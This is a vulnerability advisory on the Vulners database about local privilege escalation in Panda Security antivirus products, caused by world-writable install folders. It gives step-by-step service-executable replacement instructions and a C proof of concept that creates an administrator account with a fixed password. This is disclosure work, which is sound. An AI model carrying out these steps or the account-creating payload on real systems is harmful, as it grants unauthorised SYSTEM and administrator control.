Vulners
Lucene search
Panda Security Local Privilege Escalation
Description:
============
1. 32Bit Version of Panda Security for Desktops/File Servers
+-----------------------------------------------------------
During installation of Panda Security for Desktops/File Servers the
permissions for installation folder
%ProgramFiles%\Panda Software\AVTC\
by default are set to Everyone:Full Control. Few services
(e.g. PAVSRV51.EXE) are started from this folder. Services are started
under LocalSystem account.
The 32bit Version of Panda Security for Desktops/File Servers
installs the TruePrevent package by default, which protects the files
in the installation directory from manipulation.
If the TruePrevent Service (Panda TPSrv) is not running the files are
completely unprotected.
A normal user is not able to stop the service, but normally he can boot
his workstation in SafeBoot mode, in which the TPSrv is not started and
all services files can be manipulated.
This can be exploited by:
a. Boot the PC in SafeBoot mode, by pressing F8 during the boot
process
b. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder
c. Copy any application to PAVSRV51.exe
d. Reboot
Upon reboot trojaned application will be executed with LocalSystem
account.
Executable started as services:
+------------------------------
%ProgramFiles%\PANDA SOFTWARE\AVTC\PSKMsSvc.exe (Desktop only)
%ProgramFiles%\PANDA SOFTWARE\AVTC\PavSrv51.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PavFnSvr.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PSHost.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PsImSvc.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PsCtrlS.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\TPSrv.exe
2. 64Bit Version of Panda Security for Desktops/File Servers
+-----------------------------------------------------------
During installation of Panda Security for Desktops/File Servers the
permissions for installation folder
%ProgramFiles%\Panda Software\AVTC\
by default are set to Everyone:Full Control. Few services
(e.g. PavSrvx86.EXE) are started from this folder. Services are started
under LocalSystem account.
In the 64bit Version of Panda Security for Desktops/File Servers is no
TruePrevent package available, which protects the files in the
installation directory from manipulation.
There is no protection of service files. It's possible for unprivileged
user to replace service executable with the file of his choice to get
full access with LocalSystem privileges.
This can be exploited by:
a. Rename PavSrvX86.exe to PavSrvX86.old in Panda folder
b. Copy any application to PavSrvX86.exe
c. Reboot
Upon reboot trojaned application will be executed with LocalSystem
account.
Executable started as services:
+------------------------------
C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PavSrvX86.exe
C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PsImSvc.exe
C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PskSvc.exe
C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PsCtrlS.exe
3. Panda Internet Security/Global Protection/Antivirus Pro 20XX
+-----------------------------------------------------------------------
During installation of the Panda Security 20XX Products the
permissions for installation folder
%ProgramFiles%\panda security\panda <product>\
by default are set to Everyone:Full Control. Few services
(e.g. PAVSRV51.EXE) are started from this folder. Services are started
under LocalSystem account.
This products installs the TruePrevent package by default, which
protects the files in the installation directory from manipulation.
If the TruePrevent Service (Panda TPSrv) is not running the files are
completely unprotected.
A normal user is not able to stop the service, but normally he can boot
his workstation in SafeBoot mode, in which the TPSrv is not started and
all services files can be manipulated.
This can be exploited by:
a. Boot the PC in SafeBoot mode, by pressing F8 during the boot
process
b. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder
c. Copy any application to PAVSRV51.exe
d. Reboot
Upon reboot trojaned application will be executed with LocalSystem
account.
Executable started as services:
+------------------------------
%ProgramFiles%\panda security\panda <product>\firewall\PSHOST.EXE
%ProgramFiles%\Panda Security\Panda <product>\PavFnSvr.exe
%ProgramFiles%\Panda Security\Panda <product>\PsImSvc.exe
%ProgramFiles%\Panda Security\Panda <product>\pavsrv51.exe
%ProgramFiles%\Panda Security\Panda <product>\PskSvc.exe
%ProgramFiles%\Panda Security\Panda <product>\PsCtrls.exe
%ProgramFiles%\Panda Security\Panda <product>\TPSrv.exe
4. Panda Antivirus for Netbooks
+------------------------------
During installation of the Panda Antivirus for Netbooks the
permissions for installation folder
%ProgramFiles%\panda security\Panda Antivirus for Netbooks\
by default are set to Everyone:Full Control. Few services
(e.g. PAVSRV51.EXE) are started from this folder. Services are started
under LocalSystem account.
This product installs the TruePrevent package by default, which protects
the files in the installation directory from manipulation.
If the TruePrevent Service (Panda TPSrv) is not running the files are
completely unprotected.
A normal user is not able to stop the service, but normally he can boot
his workstation in SafeBoot mode, in which the TPSrv is not started and
all services files can be manipulated.
This can be exploited by:
a. Boot the PC in SafeBoot mode, by pressing F8 during the boot
process
b. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder
c. Copy any application to PAVSRV51.exe
d. Reboot
Upon reboot trojaned application will be executed with LocalSystem
account.
This product was not patched like the other 2010 products, so the
the following vulnerability already exists:
http://www.securityfocus.com/bid/36897
TruePrevent bypass: It can be bypassed using "Open" dialog in
"Quarantine" -> Add file" functionality.
Executable started as services:
+------------------------------
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PavFnSvr.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PsImSvc.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\pavsrv51.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PskSvc.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PsCtrls.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\TPSrv.exe
Proof of Concept :
==================
#include <windows.h>
#include <stdio.h>
INT main( VOID )
{
CHAR szWinDir[ _MAX_PATH ];
CHAR szCmdLine[ _MAX_PATH ];
GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );
printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" );
wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123
/add", szWinDir );
system( szCmdLine );
printf( "Adding user \"owner\" to the local Administrators group...\n" );
wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators
owner /add", szWinDir );
system( szCmdLine );
return 0;
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Jan 2010 00:00Current
7.1High risk
Vulners AI Score7.1